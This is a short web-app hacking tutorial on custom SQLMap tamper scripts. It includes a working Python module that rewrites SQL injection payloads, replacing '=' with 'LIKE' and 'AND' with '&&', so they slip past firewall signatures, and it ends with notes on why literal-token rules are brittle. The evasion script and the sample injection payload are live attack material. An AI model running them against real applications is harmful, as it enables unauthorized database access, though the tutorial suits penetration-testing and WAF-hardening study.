# Week 9 - SQLMap Tamper Scripts

## SQLMap Custom Tamper Scripts

Well, it’s Monday which means another Web App Hacking Tip! In week 9 we’ll be covering custom SQLMap tamper scripts.

SQL Injection is a common vulnerability found in web applications and, depending on the app, exploitation usually means bypassing some kind of Web Application Firewall (WAF). SQLMap has default tamper scripts that are useful (space2comment, charencode, randomcase), but they don’t always get the job done. I’ve found the most useful solution is to just write your own!

To start off, I recommend proxying your SQLMap traffic through Burp Suite (see the images below). This will allow you to see exactly what the WAF is blocking, and how the app responds. From there, you can craft your script to replace any characters/words that trigger the firewall.

In the images below, the tamper script replaces the ‘=’ sign with ‘LIKE’, and the ‘AND’ operator with ‘&&’. This tip pairs extremely well with Week 7’s Custom Payload creation, so I highly recommend checking that out if you enjoy SQL Injections!

![](/files/L1uZNyWP3wpBwDszODgl)

![](/files/gO74VBYPVcpZw30WGLJB)
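As an added example (not the script shown in the screenshots above, and not code from the SQLMap project), here is what the two substitutions described in this tip look like in the module layout SQLMap expects from a file dropped into its `tamper/` directory: a `dependencies()` hook, a `tamper(payload, **kwargs)` hook and a `__priority__` value. The `PRIORITY` import is the real SQLMap enum; the `ImportError` fallback is an assumption added here so the file also runs outside SQLMap. The `naive_waf_blocks()` rule and its `NAIVE_SIGNATURES` are constructed for this example only, to show the defender-side point: a rule that matches the literal tokens `=` and `AND` no longer fires once the payload is rewritten with their synonyms.

```python
# Added example for this page: a minimal custom sqlmap tamper script that
# rewrites '=' as 'LIKE' and 'AND' as '&&'. Illustrative code, not sqlmap's own.
import re

try:
    # Real sqlmap enum; available when sqlmap loads this file from tamper/.
    from lib.core.enums import PRIORITY
    __priority__ = PRIORITY.NORMAL
except ImportError:
    # Assumption for this example: running outside sqlmap (e.g. a unit test).
    __priority__ = 0

# Plain equality only: skip '=' that belongs to '<=', '>=' or '!='.
# Surrounding whitespace is absorbed so "1 = 1" and "1=1" both become "1 LIKE 1".
_EQ = re.compile(r"\s*(?<![<>!])=(?!=)\s*")
# The AND keyword as a whole word, in any case.
_AND = re.compile(r"\bAND\b", re.IGNORECASE)


def dependencies():
    """sqlmap hook: this script needs no extra setup."""
    pass


def tamper(payload, **kwargs):
    """sqlmap hook: rewrite each outgoing payload before it is sent.

    '=' becomes ' LIKE ' and 'AND' becomes '&&', mirroring the tip above.
    """
    if not payload:
        return payload
    payload = _EQ.sub(" LIKE ", payload)
    payload = _AND.sub("&&", payload)
    return payload


# Constructed toy rule (not a real WAF signature) for illustration only:
# block a request parameter if it contains a bare '=' or the word AND.
NAIVE_SIGNATURES = ("=", " AND ")


def naive_waf_blocks(param_value):
    """Return True if the toy token rule would block this parameter value."""
    upper = param_value.upper()
    return any(sig in upper for sig in NAIVE_SIGNATURES)


if __name__ == "__main__":
    original = "' AND 1=1--"  # constructed sample payload
    rewritten = tamper(original)
    print(original, "->", rewritten)
    print("naive rule blocks original:", naive_waf_blocks(original))
    print("naive rule blocks rewritten:", naive_waf_blocks(rewritten))
```

Two caveats worth keeping in mind: `&&` as a boolean operator is MySQL syntax and will not parse on most other database engines, and `LIKE` treats `%` and `_` as wildcards, so a string comparison that worked with `=` can behave differently after the rewrite. On the defensive side, the toy rule illustrates why signature lists built from literal operators are brittle; rules that cover operator synonyms (`LIKE`, `&&`, `||`) or that normalize the query before matching are the more robust approach.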
